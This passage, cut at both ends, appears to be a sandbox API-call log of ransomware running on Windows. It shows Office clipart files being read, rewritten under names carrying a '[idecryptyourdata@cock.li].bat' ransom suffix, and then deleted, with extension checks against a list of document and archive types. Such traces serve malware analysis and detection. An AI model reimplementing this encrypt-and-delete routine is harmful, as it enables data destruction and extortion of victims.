nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x1bcc, lpOverlapped=0x0) returned 1 [0198.699] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x1bd0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x1bd0, lpOverlapped=0x0) returned 1 [0198.700] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.700] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.700] SetEndOfFile (hFile=0x340) returned 1 [0198.700] CloseHandle (hObject=0x340) returned 1 [0198.700] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.700] SetEndOfFile (hFile=0x37c) returned 1 [0198.707] CloseHandle (hObject=0x37c) returned 1 [0198.707] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.221] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187847.wmf")) returned 1 [0199.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF") returned 68 [0199.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF") returned 68 [0199.222] lstrlenW (lpString=".doc") returned 4 [0199.222] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.222] lstrlenW (lpString=".docx") returned 5 [0199.222] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0199.222] lstrlenW (lpString=".pdf") returned 4 [0199.222] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.222] lstrlenW (lpString=".xls") returned 4 [0199.222] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.222] lstrlenW (lpString=".xlsx") returned 5 [0199.222] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0199.223] lstrlenW (lpString=".ppt") returned 4 [0199.223] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF") returned 68 [0199.223] lstrlenW (lpString=".zip") returned 4 [0199.223] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.223] lstrlenW (lpString=".rar") returned 4 [0199.223] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.223] lstrlenW (lpString=".bz2") returned 4 [0199.223] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.223] lstrlenW (lpString=".7z") returned 3 [0199.223] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF") returned 68 [0199.223] lstrlenW (lpString=".dbf") returned 4 [0199.223] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF") returned 68 [0199.223] lstrlenW (lpString=".1cd") returned 4 [0199.223] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF") returned 68 [0199.223] lstrlenW (lpString=".jpg") returned 4 [0199.223] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.223] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.223] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198016.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0199.224] GetLastError () returned 0x0 [0199.224] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x849c, lpOverlapped=0x0) returned 1 [0199.226] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x84a0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x84a0, lpOverlapped=0x0) returned 1 [0199.227] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.227] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.227] SetEndOfFile (hFile=0x39c) returned 1 [0199.227] CloseHandle (hObject=0x39c) returned 1 [0199.228] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.228] SetEndOfFile (hFile=0x38c) returned 1 [0199.228] CloseHandle (hObject=0x38c) returned 1 [0199.228] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.229] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198016.wmf")) returned 1 [0199.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF") returned 68 [0199.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF") returned 68 [0199.230] lstrlenW (lpString=".doc") returned 4 [0199.230] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.230] lstrlenW (lpString=".docx") returned 5 [0199.230] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0199.230] lstrlenW (lpString=".pdf") returned 4 [0199.230] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.231] lstrlenW (lpString=".xls") returned 4 [0199.231] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.231] lstrlenW (lpString=".xlsx") returned 5 [0199.231] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0199.231] lstrlenW (lpString=".ppt") returned 4 [0199.231] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF") returned 68 [0199.231] lstrlenW (lpString=".zip") returned 4 [0199.231] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.231] lstrlenW (lpString=".rar") returned 4 [0199.231] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.231] lstrlenW (lpString=".bz2") returned 4 [0199.231] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.231] lstrlenW (lpString=".7z") returned 3 [0199.231] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF") returned 68 [0199.231] lstrlenW (lpString=".dbf") returned 4 [0199.231] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF") returned 68 [0199.231] lstrlenW (lpString=".1cd") returned 4 [0199.231] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198016.WMF") returned 68 [0199.231] lstrlenW (lpString=".jpg") returned 4 [0199.231] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.231] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.231] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.232] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198020.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0199.232] GetLastError () returned 0x0 [0199.232] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x5cae, lpOverlapped=0x0) returned 1 [0199.234] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x5cb0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x5cb0, lpOverlapped=0x0) returned 1 [0199.235] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.235] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.235] SetEndOfFile (hFile=0x39c) returned 1 [0199.235] CloseHandle (hObject=0x39c) returned 1 [0199.236] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.236] SetEndOfFile (hFile=0x38c) returned 1 [0199.236] CloseHandle (hObject=0x38c) returned 1 [0199.237] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.237] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198020.wmf")) returned 1 [0199.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF") returned 68 [0199.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF") returned 68 [0199.237] lstrlenW (lpString=".doc") returned 4 [0199.237] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.237] lstrlenW (lpString=".docx") returned 5 [0199.238] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0199.238] lstrlenW (lpString=".pdf") returned 4 [0199.238] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.238] lstrlenW (lpString=".xls") returned 4 [0199.238] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.238] lstrlenW (lpString=".xlsx") returned 5 [0199.238] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0199.238] lstrlenW (lpString=".ppt") returned 4 [0199.238] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF") returned 68 [0199.238] lstrlenW (lpString=".zip") returned 4 [0199.238] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.238] lstrlenW (lpString=".rar") returned 4 [0199.238] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.238] lstrlenW (lpString=".bz2") returned 4 [0199.238] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.238] lstrlenW (lpString=".7z") returned 3 [0199.238] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF") returned 68 [0199.238] lstrlenW (lpString=".dbf") returned 4 [0199.238] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF") returned 68 [0199.238] lstrlenW (lpString=".1cd") returned 4 [0199.238] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198020.WMF") returned 68 [0199.238] lstrlenW (lpString=".jpg") returned 4 [0199.238] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.239] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.239] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198021.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0199.239] GetLastError () returned 0x0 [0199.239] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x8860, lpOverlapped=0x0) returned 1 [0199.249] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x8870, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x8870, lpOverlapped=0x0) returned 1 [0199.250] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.250] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.250] SetEndOfFile (hFile=0x39c) returned 1 [0199.250] CloseHandle (hObject=0x39c) returned 1 [0199.251] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.251] SetEndOfFile (hFile=0x38c) returned 1 [0199.251] CloseHandle (hObject=0x38c) returned 1 [0199.252] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.252] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198021.wmf")) returned 1 [0199.252] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF") returned 68 [0199.252] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF") returned 68 [0199.252] lstrlenW (lpString=".doc") returned 4 [0199.252] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.252] lstrlenW (lpString=".docx") returned 5 [0199.252] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0199.252] lstrlenW (lpString=".pdf") returned 4 [0199.252] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.253] lstrlenW (lpString=".xls") returned 4 [0199.253] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.253] lstrlenW (lpString=".xlsx") returned 5 [0199.253] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0199.253] lstrlenW (lpString=".ppt") returned 4 [0199.253] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF") returned 68 [0199.253] lstrlenW (lpString=".zip") returned 4 [0199.253] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.253] lstrlenW (lpString=".rar") returned 4 [0199.253] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.253] lstrlenW (lpString=".bz2") returned 4 [0199.253] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.253] lstrlenW (lpString=".7z") returned 3 [0199.253] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF") returned 68 [0199.253] lstrlenW (lpString=".dbf") returned 4 [0199.253] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF") returned 68 [0199.253] lstrlenW (lpString=".1cd") returned 4 [0199.253] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198021.WMF") returned 68 [0199.253] lstrlenW (lpString=".jpg") returned 4 [0199.253] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.254] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.254] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198022.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0199.254] GetLastError () returned 0x0 [0199.255] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x6624, lpOverlapped=0x0) returned 1 [0199.306] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x6630, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x6630, lpOverlapped=0x0) returned 1 [0199.307] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.307] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.307] SetEndOfFile (hFile=0x39c) returned 1 [0199.308] CloseHandle (hObject=0x39c) returned 1 [0199.308] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.308] SetEndOfFile (hFile=0x38c) returned 1 [0199.309] CloseHandle (hObject=0x38c) returned 1 [0199.309] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.309] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198022.wmf")) returned 1 [0199.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF") returned 68 [0199.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF") returned 68 [0199.309] lstrlenW (lpString=".doc") returned 4 [0199.309] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.310] lstrlenW (lpString=".docx") returned 5 [0199.310] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0199.310] lstrlenW (lpString=".pdf") returned 4 [0199.310] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.310] lstrlenW (lpString=".xls") returned 4 [0199.310] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.310] lstrlenW (lpString=".xlsx") returned 5 [0199.310] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0199.310] lstrlenW (lpString=".ppt") returned 4 [0199.310] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF") returned 68 [0199.310] lstrlenW (lpString=".zip") returned 4 [0199.310] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.310] lstrlenW (lpString=".rar") returned 4 [0199.310] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.310] lstrlenW (lpString=".bz2") returned 4 [0199.310] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.310] lstrlenW (lpString=".7z") returned 3 [0199.310] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF") returned 68 [0199.310] lstrlenW (lpString=".dbf") returned 4 [0199.310] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF") returned 68 [0199.310] lstrlenW (lpString=".1cd") returned 4 [0199.310] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198022.WMF") returned 68 [0199.310] lstrlenW (lpString=".jpg") returned 4 [0199.310] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.311] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.311] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198025.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0199.312] GetLastError () returned 0x0 [0199.312] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x3cce, lpOverlapped=0x0) returned 1 [0199.439] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x3cd0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x3cd0, lpOverlapped=0x0) returned 1 [0199.440] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.440] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.440] SetEndOfFile (hFile=0x39c) returned 1 [0199.440] CloseHandle (hObject=0x39c) returned 1 [0199.440] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.440] SetEndOfFile (hFile=0x38c) returned 1 [0199.441] CloseHandle (hObject=0x38c) returned 1 [0199.441] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.441] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198025.wmf")) returned 1 [0199.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF") returned 68 [0199.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198025.WMF") returned 68 [0199.442] lstrlenW (lpString=".doc") returned 4 [0199.442] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 